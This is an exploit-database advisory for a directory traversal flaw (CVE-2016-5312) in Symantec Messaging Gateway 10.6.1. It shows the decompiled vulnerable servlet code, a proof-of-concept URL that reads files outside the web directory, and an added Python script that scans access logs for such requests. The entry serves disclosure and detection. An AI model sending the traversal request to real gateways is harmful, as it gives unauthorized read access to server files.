Symantec Messaging Gateway 10.6.1 – Directory Traversal

  • Author: R-73eN
    Date: 2016-09-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40437/
  • # Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
    # Date : 28/09/2016
    # Author : R-73eN
    # Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
    # Software : https://www.symantec.com/products/threat-protection/messaging-gateway
    # Vendor : Symantec
    # CVE : CVE-2016-5312
    # Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
    # 
    # DESCRIPTION:
    #
    # A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. 
    # This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. 
    # This could potentially provide read access to some files/directories on the server for which the user is not authorized.
    #
    The problem lies in the package kavachart-kcServlet-5.3.2.jar, file: com/ve/kavachart/servlet/ChartStream.java
    The vulnerable code is:

    extends HttpServlet {
        public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
            block6 : {
                try {
                    String string = httpServletRequest.getParameter("sn");
                    //**** Takes the "sn" parameter and stores it in the variable "string"

                    if (string == null) break block6;
                    String string2 = string.substring(string.length() - 3);

                    byte[] arrby = (byte[])this.getServletContext().getAttribute(string);

                    //**** The string variable is passed here without any sanitization against directory traversal,
                    //**** so it can be used to perform a directory traversal.

                    if (arrby != null) {
                        httpServletResponse.setContentType("image/" + string2);
                        ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                        httpServletResponse.setContentLength(arrby.length);
                        servletOutputStream.write(arrby);
                        this.getServletContext().removeAttribute(string);
                        break block6;
                    }

    POC: 
    https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
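
For reviewing an appliance's web access logs for requests like the PoC above, the following detection sketch is an added example, not part of the original advisory or of Symantec's code. It assumes combined-format access log lines; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Servlet path taken from the PoC URL in the advisory.
SERVLET = "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"
# Assumed log format: the request line appears quoted, as in combined logs.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real appliance).
_PREFIX = '10.0.0.5 - - [28/Sep/2016:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    _PREFIX + SERVLET + '?sn=chart1234.png HTTP/1.1" 200 5120',
    _PREFIX + SERVLET + '?sn=../../WEB-INF/lib HTTP/1.1" 200 733',
    _PREFIX + SERVLET + '?sn=%252e%252e%252fWEB-INF%252flib HTTP/1.1" 200 733',
    _PREFIX + '/brightmail/login.do?sn=../x HTTP/1.1" 200 90',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_sn(sn):
    """True if the decoded sn value contains a parent-directory segment,
    is an absolute path, or carries a NUL byte."""
    sn = fully_decode(sn).replace("\\", "/")
    return ".." in sn.split("/") or sn.startswith("/") or "\x00" in sn


def scan(lines):
    """Return (line_number, sn_value) for each ChartStream request to review."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # Drop any ";jsessionid=..." path parameter before comparing.
        if fully_decode(target.path).split(";")[0] != SERVLET:
            continue
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == "sn" and suspicious_sn(value):
                hits.append((number, value))
    return hits
```

Calling `scan(SAMPLE_LOG)` flags the second and third constructed lines; any hit on a real appliance that predates the vendor fix warrants checking the response size and status for that request.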